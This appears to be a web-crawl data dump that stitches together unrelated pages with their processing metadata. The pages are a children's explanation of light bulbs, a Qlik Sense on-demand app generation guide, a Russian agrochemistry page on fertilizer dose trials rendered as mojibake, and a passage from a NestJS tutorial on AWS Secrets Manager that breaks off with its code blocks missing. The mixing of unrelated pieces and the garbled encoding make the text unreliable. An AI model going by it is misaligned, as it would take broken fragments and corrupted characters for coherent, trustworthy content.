"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "2",
"label": "Partially Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-5,961,916,559,485,613,000
|
Pages Menu
TwitterRssFacebook
Categories Menu
Posted by on Jun 7, 2015 in Tell Me Why Numerous Questions and Answers |
How Does a Light Bulb Work?
How Does a Light Bulb Work?
Inside a light bulb, a glass rod supports a thin, coiled wire called a filament. It is made of tungsten, a special metal that can stand extreme heat. When electricity passes through the tungsten filament, the filament becomes so hot that it glows with a bright light.
Before the bulb and its contents are sealed up tight all the air is pumped out, and a special non-burning gas is put in. This is done because the hot filament would quickly burn up if exposed to air. The inside of the bulb is given a white coat to make the bulb’s light softer.
Another common type of light is the fluorescent lamp. A fluorescent lamp is a glass tube filled with argon gas and a trough of mercury. When electrical current is passed through the gas the atoms of the gas pick up energy and radiate it in the form of ultra-violet light and some heat. The UV light then strikes the inside of the tube, which is coated with a phosphor. The phosphor glows, giving off the light we see.
Fluorescent lamps don’t require high temperatures to produce light, like incandescent bulbs do. Energy must be used in heating the incandescent bulb, and a large part of that energy is lost as heat, not light. In the fluorescent lamp, a larger portion of the energy is radiated as light.
Content for this question contributed by Wendy Palagyi, resident of Madison, Ohio, USA
|
{
"url": "http://www.juniorsbook.com/tell-me-why-numerous-questions-and-answers/how-does-a-light-bulb-work/",
"source_domain": "www.juniorsbook.com",
"snapshot_id": "crawl=CC-MAIN-2018-51",
"warc_metadata": {
"Content-Length": "24009",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:WJMMDC6FYPSOFXPM4VDX42PROHWM3DOM",
"WARC-Concurrent-To": "<urn:uuid:066d4b7c-8247-41f6-b42a-e4ccc8819dfc>",
"WARC-Date": "2018-12-19T10:37:06Z",
"WARC-IP-Address": "148.66.136.52",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:7ORA57V5QECERTBAMKOBWTDSY3JNVUKP",
"WARC-Record-ID": "<urn:uuid:9dd874bf-c4d6-4a09-87cf-233d6185a510>",
"WARC-Target-URI": "http://www.juniorsbook.com/tell-me-why-numerous-questions-and-answers/how-does-a-light-bulb-work/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:aca06f66-c3cc-4095-a6fc-301744111899>"
},
"warc_info": "isPartOf: CC-MAIN-2018-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-43-183-218.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
11,
30,
46,
47,
120,
121,
149,
150,
178,
179,
447,
448,
726,
727,
1145,
1146,
1434,
1435
],
"line_end_idx": [
11,
30,
46,
47,
120,
121,
149,
150,
178,
179,
447,
448,
726,
727,
1145,
1146,
1434,
1435,
1521
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1521,
"ccnet_original_nlines": 18,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.36741214990615845,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.009584659710526466,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12140575051307678,
"rps_doc_frac_unique_words": 0.5384615659713745,
"rps_doc_mean_word_length": 4.4175825119018555,
"rps_doc_num_sentences": 17,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.534607887268066,
"rps_doc_word_count": 273,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.03482586890459061,
"rps_doc_frac_chars_dupe_6grams": 0.03482586890459061,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.016583750024437904,
"rps_doc_frac_chars_top_3gram": 0.024875620380043983,
"rps_doc_frac_chars_top_4gram": 0.021558869630098343,
"rps_doc_books_importance": -144.74415588378906,
"rps_doc_books_importance_length_correction": -134.28189086914062,
"rps_doc_openwebtext_importance": -87.90399169921875,
"rps_doc_openwebtext_importance_length_correction": -87.90399169921875,
"rps_doc_wikipedia_importance": -64.62562561035156,
"rps_doc_wikipedia_importance_length_correction": -51.84632110595703
},
"fasttext": {
"dclm": 0.8395091891288757,
"english": 0.9281538128852844,
"fineweb_edu_approx": 3.19435453414917,
"eai_general_math": 0.459547221660614,
"eai_open_web_math": 0.37567752599716187,
"eai_web_code": 0.0006149400142021477
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "621.314",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
},
"secondary": {
"code": "621.3142",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "9",
"label": "FAQ"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
4,331,876,670,442,224,000
|
On Demand App Generation (ODAG) Best Practices in Qlik Sense (3.0 and 2017 releases)
On Demand App Generation (ODAG) was an approach introduced in Qlik Sense 3.0 to use the Qlik Analytic Platform (QAP) APIs to create Qlik Sense applications for very large or frequently changing data sets.
The ODAG method provides an easy way to generate applications containing slices of data from a very large data set, without needing to load all data into memory in Qlik Sense. Users make selections in “selection” or “parent” apps which contain an aggregated view of the entire data set, and can generate their own apps built using specific scopes of data driven by these selections. The resulting “detail” or “child” apps reload while the user waits to provide up to the full granularity of the data set, over a limited row set.
Qlik Sense 3.0 – via Extension
Initially, functionality was provided via extensions only, interacting with the public APIs. As per the ODAG user guide released with the extension, this required a few tweaks of the Qlik Sense security rules, and upload of the extension (http://branch.qlik.com/#!/project/56f1689bc5b2f734933c7e52) to the server.
As Qlik Sense lacks popular QlikView features like loop and reduce and native document chaining, this provided a first step into making larger data sets accessible with Qlik Sense (without using Direct Discovery, which has limitations).
Qlik Sense June 2017 onward – Native
With the June 2017 release, the extension was moved into Qlik Sense as a native feature, and an on-demand service added to control the logging level and the number of apps that could be generated at one time.
From the extension, the only feature lost was the ability to set a name for the child apps from within the selection app (instead, it takes the name of the template and appends the user directory and name). This gap is partially covered by providing an ODAG “drawer” from which users can recall a list of generated apps, complete with the selections they made to create each one.
Over time, extra configuration options were added, although the initial state allowed developers to specify how many child apps users can keep per ODAG link, and for how long these are retained on the server.
For more information on the configuration options and the code required to create bindings, see this Qlik help page.
Considerations for maximising value from ODAG
Here’s a few thoughts on how to reduce risk and increase the stability and scalability of your ODAG solution:
• Ensure your aggregated data carries a proxy for the total row count, which can then be used in the ODAG row limit. Aim to keep these slices to ~100,000 rows (depending on your data source and query complexity)
• Provide your users with guidance on which fields they need to make selections in and the current row count, and set expectations over generation time and retention of those applications (e.g. if you have an ODAG link set to remove apps after three days, state this in the selection and detail apps)
• Provide a summary of selections used to generate the detail app in the detail app. Don’t rely on users going back to the selection app and checking the ODAG link pane – ensure you minimise the risk of user error
• Ensure the ODAG selection and detail apps have a similar look and feel, as well as navigation. The user should be able to see that the apps are related, and that the detail app is in fact their own copy of a template loaded with only the data they requested
• ODAG data sources should be optimised for your queries. For QVDs, this means creating index QVDs which map to the main Fact QVDs via key fields – therefore allowing an optimised load on the slowest step. For technologies like Impala, this is ensuring the table is partitioned by the most common fields a user makes selections in (alternatively, consider using odso to ensure you always limit the data using fields in the partition). In SQL server, Oracle etc, you’ll want to be maintaining indexes on important fields and considering the use of integer values or keys
• The ODAG binding types (ods/odo/odso) should be used appropriately. Fields with a high number of distinct or long values, should avoid the use of odso (as this passes every selected or optional value in the field), rather using this for date fields that might be indexed in the data source
|
{
"url": "https://withdave.com/2017/12/on-demand-app-generation-odag-best-practices-in-qlik-sense-3-0-and-2017-releases/",
"source_domain": "withdave.com",
"snapshot_id": "crawl=CC-MAIN-2019-09",
"warc_metadata": {
"Content-Length": "86720",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:HHTZT44UXMOOHLJXWHO6ZXUYLTHWTH2E",
"WARC-Concurrent-To": "<urn:uuid:b2c88789-03be-404b-ba22-55092a169dfa>",
"WARC-Date": "2019-02-19T13:25:21Z",
"WARC-IP-Address": "104.28.5.25",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:X6TZWYLHQ2K7MCNICDNONT5FCJNOXSEV",
"WARC-Record-ID": "<urn:uuid:96584415-0d3f-4349-abda-e311122333b2>",
"WARC-Target-URI": "https://withdave.com/2017/12/on-demand-app-generation-odag-best-practices-in-qlik-sense-3-0-and-2017-releases/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:2e825ba2-0f23-4406-a8f0-17d655a075b9>"
},
"warc_info": "isPartOf: CC-MAIN-2019-09\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-141-110-199.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
85,
86,
291,
292,
821,
822,
853,
854,
1168,
1169,
1406,
1407,
1444,
1445,
1654,
1655,
2035,
2036,
2245,
2246,
2363,
2364,
2410,
2411,
2521,
2522,
2736,
3039,
3255,
3517,
4089
],
"line_end_idx": [
85,
86,
291,
292,
821,
822,
853,
854,
1168,
1169,
1406,
1407,
1444,
1445,
1654,
1655,
2035,
2036,
2245,
2246,
2363,
2364,
2410,
2411,
2521,
2522,
2736,
3039,
3255,
3517,
4089,
4382
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4382,
"ccnet_original_nlines": 31,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4002320170402527,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.018561480566859245,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.13805103302001953,
"rps_doc_frac_unique_words": 0.4211229979991913,
"rps_doc_mean_word_length": 4.700534820556641,
"rps_doc_num_sentences": 28,
"rps_doc_symbol_to_word_ratio": 0.0011600899742916226,
"rps_doc_unigram_entropy": 5.149240970611572,
"rps_doc_word_count": 748,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.014220709912478924,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02559727057814598,
"rps_doc_frac_chars_top_3gram": 0.009385669603943825,
"rps_doc_frac_chars_top_4gram": 0.0119453901425004,
"rps_doc_books_importance": -281.5099792480469,
"rps_doc_books_importance_length_correction": -281.5099792480469,
"rps_doc_openwebtext_importance": -268.72314453125,
"rps_doc_openwebtext_importance_length_correction": -268.72314453125,
"rps_doc_wikipedia_importance": -213.52244567871094,
"rps_doc_wikipedia_importance_length_correction": -213.52244567871094
},
"fasttext": {
"dclm": 0.02306246943771839,
"english": 0.9075889587402344,
"fineweb_edu_approx": 2.3284928798675537,
"eai_general_math": 0.6858845949172974,
"eai_open_web_math": 0.19336026906967163,
"eai_web_code": 0.6873738765716553
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.467",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.776",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-533,419,433,304,928,300
|
Íîâîñòè
Ëàíäøàôòíûé äèçàéí - ýòî èñêóññòâî ñîçäàíèÿ ãàðìîíè÷íîãî îêðóæàþùåãî ïðîñòðàíñòâà, êîòîðîå îáúåäèíÿåò àðõèòåêòóðó è ïðèðîäó.  ýòîì êîíòåêñòå, ïåñ÷àíûå áàññåéíû ñòàëè êëþ÷åâûì ýëåìåíòîì äèçàéíà, ïîçâîëÿþùèì âîïëîòèòü â æèçíü êîíöåïöèþ åñòåñòâåííîé ãàðìîíèè.
Ïóøêèíñêèé ìóçåé èçîáðàçèòåëüíûõ èñêóññòâ çàíèìàåò îñîáîå ìåñòî ñðåäè êóëüòóðíûõ èíñòèòóòîâ Ìîñêâû. Ýòîò ìóçåé – âàæíàÿ ñîêðîâèùíèöà èñêóññòâà. Êðîìå òîãî, ýòî óíèêàëüíîå ïðîñòðàíñòâî äëÿ çíàêîìñòâà ñ øåäåâðàìè ðàçíûõ ýïîõ è ñòèëåé.
Ñòèë Íîðä — ýòî ïðîèçâîäñòâåííàÿ êîìïàíèÿ èç ãîðîäà Ïåñòîâî Íîâãîðîäñêîé îáëàñòè, çàíèìàþùàÿñÿ âûïóñêîì àíòèâàíäàëüíîé ñàíòåõíèêè — ïðîäóêöèè, èçãîòàâëèâàåìîé èç íåðæàâåþùåé ñòàëè, ÷òî äåëàåò å¸ ïðàêòè÷åñêè ïîëíîñòüþ çàùèù¸ííîé îò âîçäåéñòâèé êàê ÷åëîâåêà, òàê è ïðèðîäû.
ßíäåêñ.Ìåòðèêà
Óñòàíîâëåíèå îïòèìàëüíûõ äîç óäîáðåíèé
Åñëè òðåáóåòñÿ óñòàíîâèòü, êàêàÿ äîçà óäîáðåíèé â äàííûõ óñëîâèÿõ äàåò ìàêñèìàëüíóþ îïëàòó åäèíèöû ïèòàòåëüíîãî âåùåñòâà â óäîáðåíèè è ïðè êàêîé äîçå ïîëó÷àåòñÿ â äàííûõ óñëîâèÿõ ìàêñèìàëüíûé óðîæàé, à òàêæå êàêàÿ äîçà õîçÿéñòâåííî íàèáîëåå âûãîäíàÿ, íåîáõîäèìî ïîëó÷èòü êðèâóþ èçìåíåíèÿ óðîæàåâ ïðè âîçðàñòàíèè äîç óäîáðåíèé. Ïðàêòè÷åñêè íå òðåáóåòñÿ íàëè÷èÿ â îïûòå ìíîãèõ âàðèàíòîâ ñ ðàçëè÷íûìè äîçèðîâêàìè. Èíòåðâàëû ìåæäó äâóìÿ äîçàìè äîëæíû áûòü äîñòàòî÷íî âåëèêè, ÷òîáû ïðèáàâêè îò ñîñåäíèõ äîç ìîãëè ðàçëè÷àòüñÿ íà âåëè÷èíó, ïðåâîñõîäÿùóþ îøèáêó îïûòà. Ïîýòîìó îáû÷íî áûâàåò âïîëíå äîñòàòî÷íûì íàëè÷èå â îïûòå òðåõ-÷åòûðåõ äîç. Äëÿ õàðàêòåðèñòèêè äåéñòâèÿ îòäåëüíîé äîçû ñ öåëüþ óñòàíîâëåíèÿ åå õîçÿéñòâåííîé ïðèãîäíîñòè íåîáõîäèìî çíàòü àáñîëþòíóþ ïðèáàâêó óðîæàÿ, ïîëó÷àåìóþ îò äàííîé äîçû óäîáðåíèÿ. Ñëåäîâàòåëüíî, â ýòîì ñëó÷àå îñíîâíûì êîíòðîëüíûì âàðèàíòîì ÿâëÿåòñÿ âàðèàíò áåç óäîáðåíèé. Ho åãî íåäîñòàòî÷íî; âîçìîæíî, ÷òî òà æå ïðèáàâêà óðîæàÿ ìîæåò áûòü ïîëó÷åíà è ïðè ìåíüøåé äîçå óäîáðåíèÿ. Âîçìîæíî, îäíàêî, ÷òî äàëüíåéøåå óâåëè÷åíèå äîçû óäîáðåíèÿ îêàæåòñÿ åùå áîëåå âûãîäíûì; äëÿ âûÿñíåíèÿ ýòîãî íåîáõîäèìî èìåòü â îïûòå äîçó áîëüøóþ, ÷åì èçó÷àåìàÿ. Òàêèì îáðàçîì, äëÿ îöåíêè ïðàâèëüíîñòè âûáðàííîé äîçû íåîáõîäèìî èìåòü äâå äîçû, ìåíüøóþ è áîëüøóþ. Íàèáîëåå óäîáíî áðàòü ïîëîâèííóþ äîçó è ïîëóòîðíóþ. Äîçû óäîáðåíèé, èñïûòàííûå íà îäíîì ôîíå, ÷àñòî íåïðèãîäíû íà äðóãîì ôîíå óäîáðåíèé èëè àãðîòåõíèêè. Íàïðèìåð, îïòèìàëüíûå äîçû àçîòà ïðè íàëè÷èè ïîëèâà áóäóò îäíè, áåç ïîëèâà — äðóãèå, íà ôîíå ôîñôîðà — îäíè, áåç ôîñôîðà — äðóãèå è ò. ä.
Îïûòû ñ äîçàìè åñòåñòâåííî ïåðåõîäÿò â êîìïëåêñíûå îïûòû ïî èçó÷åíèþ ñîîòíîøåíèÿ ïèòàòåëüíûõ âåùåñòâ ïðè ðàçëè÷íûõ äîçàõ. Äëÿ èçó÷åíèÿ ñîîòíîøåíèÿ êîìïîíåíòîâ â ñîñòàâå ñìåøàííûõ óäîáðåíèé Î. Øðåéíåð ïðåäëîæèë òàêóþ ïîñòàíîâêó îïûòîâ ïî òðåóãîëüíîé ñèñòåìå, ïðè êîòîðîé â îñíîâó âñåõ êîìáèíàöèé êëàäåòñÿ ñóììà N + P2O5 + K2O è âñå êîìáèíàöèè, ó÷àñòâóþùèå â îïûòàõ, äîëæíû èìåòü îäíó è òó æå ñóììó ýòèõ ýëåìåíòîâ. Ïðè òàêîé ñèñòåìå ÷èñòî ìåõàíè÷åñêîå óñòàíîâëåíèå âîçìîæíûõ êîìáèíàöèé ëèøàåò âîçìîæíîñòè ïðîâåðèòü ïðèãîäíîñòü äàæå ñàìûõ õîäîâûõ êîìáèíàöèé. Íåëüçÿ, îñòàâëÿÿ íîðìàëüíóþ äîçó àçîòà, âûêëþ÷èòü äåéñòâèå ôîñôîðà, òàê êàê àçîò, ôîñôîð èëè êàëèé â îòäåëüíîñòè íå ìîãóò áûòü äàíû ïðè ñèñòåìå òðåóãîëüíèêà â äîçå, ìåíüøåé ñóììû äîç âñåõ òðåõ ýëåìåíòîâ.  ñõåìå òàêîãî îïûòà íåò äàæå ñðàâíèìûõ äåëÿíîê, òàê êàê âñå îíè îòëè÷àþòñÿ ñðàçó ïî äîçàì ïî êðàéíåé ìåðå äâóõ ïèòàòåëüíûõ âåùåñòâ.
© 2012-2016 Âñå îá àãðîõèìèè Âñå ïðàâà çàùèùåíû
Ïðè öèòèðîâàíèè è èñïîëüçîâàíèè ëþáûõ ìàòåðèàëîâ ññûëêà íà ñàéò îáÿçàòåëüíà
|
{
"url": "https://agrohimija24.ru/agrohimicheskie-metody/1985-ustanovlenie-optimalnyh-doz-udobreniy.html",
"source_domain": "agrohimija24.ru",
"snapshot_id": "CC-MAIN-2023-40",
"warc_metadata": {
"Content-Length": "33387",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PNFGAGKZPQQZNXTYOT7NVAVAIZ3A4IZD",
"WARC-Concurrent-To": "<urn:uuid:4b47fdc9-8c59-4f67-a194-592cf2f27c7c>",
"WARC-Date": "2023-09-23T13:49:28Z",
"WARC-IP-Address": "185.244.218.180",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:7WI2AINGWGDYVHPFG3WLJIWYV6KEHYPB",
"WARC-Record-ID": "<urn:uuid:92f3e05b-3cd6-4911-881a-b6cefc45d694>",
"WARC-Target-URI": "https://agrohimija24.ru/agrohimicheskie-metody/1985-ustanovlenie-optimalnyh-doz-udobreniy.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:335b0761-4fad-4618-b6d1-4326e0c41a3d>"
},
"warc_info": "isPartOf: CC-MAIN-2023-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-18\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
2,
10,
11,
12,
270,
271,
272,
273,
274,
507,
508,
509,
510,
511,
783,
784,
785,
800,
839,
840,
2403,
3296,
3297,
3298,
3346
],
"line_end_idx": [
2,
10,
11,
12,
270,
271,
272,
273,
274,
507,
508,
509,
510,
511,
783,
784,
785,
800,
839,
840,
2403,
3296,
3297,
3298,
3346,
3421
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3421,
"ccnet_original_nlines": 25,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.009983359836041927,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.9933444261550903,
"rps_doc_frac_unique_words": 0.699999988079071,
"rps_doc_mean_word_length": 11.965217590332031,
"rps_doc_num_sentences": 27,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.5429511070251465,
"rps_doc_word_count": 460,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.006540699861943722,
"rps_doc_frac_chars_top_3gram": 0.010901159606873989,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -295.7611083984375,
"rps_doc_books_importance_length_correction": -295.7611083984375,
"rps_doc_openwebtext_importance": -166.0972900390625,
"rps_doc_openwebtext_importance_length_correction": -166.0972900390625,
"rps_doc_wikipedia_importance": -91.49298095703125,
"rps_doc_wikipedia_importance_length_correction": -91.49298095703125
},
"fasttext": {
"dclm": 0.09303724765777588,
"english": 0.00582017982378602,
"fineweb_edu_approx": 2.0091593265533447,
"eai_general_math": 0.004339519888162613,
"eai_open_web_math": -0.000009890000001178123,
"eai_web_code": 0.4461129307746887
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "540.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": ""
}
},
"secondary": {
"code": "546.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Inorganic"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,278,797,573,018,373,400
|
API with NestJS #101. Managing sensitive data using the AWS Secrets Manager
AWS NestJS
This entry is part 101 of 146 in the API with NestJS
When managing the architecture of our system, we often deal with sensitive data. It’s our job to ensure they don’t fall into the wrong hands. An excellent example of confidential information is the database password and the Json Web Token secret key. In this article, we explore how we can use the AWS Secrets Manager to increase the security of our NestJS application.
Defining environment variables
It’s tough to hide a piece of information when it is included in the source code of our application.
database.module.ts
With the above approach, everyone with access to our code has full access to our database. This is a significant security issue that might lead to compromising our database. This might be especially apparent if we write open-source software, but it is not limited to it. For example, we might have teammates we trust enough to provide them with the code, but we wouldn’t want them tinkering with the production database.
Besides that, our testing environment will surely use a different database than the production environment. When we include environment-specific details in our code, we don’t have a straightforward way of reusing our code across different environments.
We can solve the above problems by externalizing specific values in the form of environment variables. The NestJS application we’ve created during this series has a bunch of them. A good example is the password of our PostgreSQL database. A good way of introducing an environment variable is to add it to our . When doing that, we force NestJS to check if all necessary environment variables are provided. If we forget to provide a specific variable we marked as required, the application won’t start.
app.module.ts
Using environment variables, we can now improve our and avoid hardcoding sensitive information in our code.
database.module.ts
Providing the values for the environment variables
When we develop and run our application locally on our machine, we can provide the values for our environment variables by creating a dedicated file called .
It is a good practice to avoid commiting the file to the repository.
.env
Since our application runs in Docker, we need to point it to the file containing our environment variables.
docker-compose.yml
If you want to know more about running NestJS using Docker, check out API with NestJS #91. Dockerizing a NestJS API with Docker Compose
Environment variables values in ECS
In one of the previous parts of this series, we learned how to deploy our NestJS application using Amazon Elastic Container Service. One of the important parts of it was providing the environment variables for our application running in the cluster.
So far, we’ve been doing that by putting the values directly into the task definition.
Unfortunately, this has some downsides. First, we need to acknowledge that in real-life scenarios, a web application is managed by a whole team of people. Each person might have their own AWS account and access to certain parts of our configuration.
With the above approach, everyone who can access our task definition has access to all of our environment variables, including sensitive data. To deal with this issue, we can use the AWS Secrets Manager.
Introducing AWS Secrets Manager
With AWS Secrets Manager, we can control access to sensitive information, such as database credentials and private keys. We can also rotate them by configuring AWS to change the passwords automatically.
Integration with RDS
Let’s start by opening the Secrets Manager dashboard and going to the secrets page. When we do that, we notice that we might already have some secrets defined.
This is because Relational Database Service (RDS) is integrated with the Secrets Manager. When we created our database, AWS stored our credentials in the Secrets Manager.
If you want to read morea bout using the Relational Database Service, check out API with NestJS #93. Deploying a NestJS app with Amazon ECS and RDS
When we click on the name of our secret, we can access all of the associated values.
